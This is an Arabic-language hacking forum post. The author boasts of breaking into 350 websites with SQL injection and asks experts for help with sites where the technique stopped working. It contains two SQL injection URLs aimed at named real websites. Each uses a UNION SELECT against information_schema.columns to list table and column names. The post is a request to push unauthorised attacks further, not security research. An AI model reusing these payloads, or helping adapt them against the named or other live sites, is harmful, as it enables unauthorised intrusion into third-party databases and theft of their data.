مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...

[guba.1]

سلام عليكم ورحمه الله

اخواني انا واعوذ بالله من كلمه انا اخترقت 350 موقع بـ الـ sql يعني ولحمد لله متمكن من هاذي الثغره

لااكن واجهتني مشكله فـ الاونه الاخيره

وهيا مثل هاذا الموقع ...

كود PHP:

http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29-- 


وهاذا ..

كود PHP:

http://hotelacostacentro.com/noticia.php?id=-11%27%20UNION%20SELECT%201,2,3,4,%28CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,6,7,8,9,10,11,12+from+information_schema.columns%29--%20- 


والكثير الكثير مثل هاذي المشكله

فـ اتمنى طريقة حل هاذي المشكله وطرح الطريقه لتعم الفائده الرجاء اي شخص يمر ع الموضوع يشارك ولو بظم صوته الى صوتي ..,

احترامي ,